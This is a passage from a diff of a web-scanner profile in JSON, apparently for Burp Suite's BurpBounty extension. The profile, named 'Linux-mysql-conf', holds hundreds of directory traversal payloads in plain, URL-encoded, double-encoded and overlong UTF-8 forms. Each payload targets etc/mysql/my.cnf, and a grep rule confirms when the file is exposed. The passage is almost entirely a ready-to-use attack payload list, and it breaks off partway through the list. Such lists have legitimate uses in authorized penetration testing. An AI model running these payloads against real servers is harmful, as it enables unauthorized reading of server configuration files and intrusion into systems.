.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,MySQL database server"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-mysql-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/mysql/my.cnf","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-mysql-conf", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + 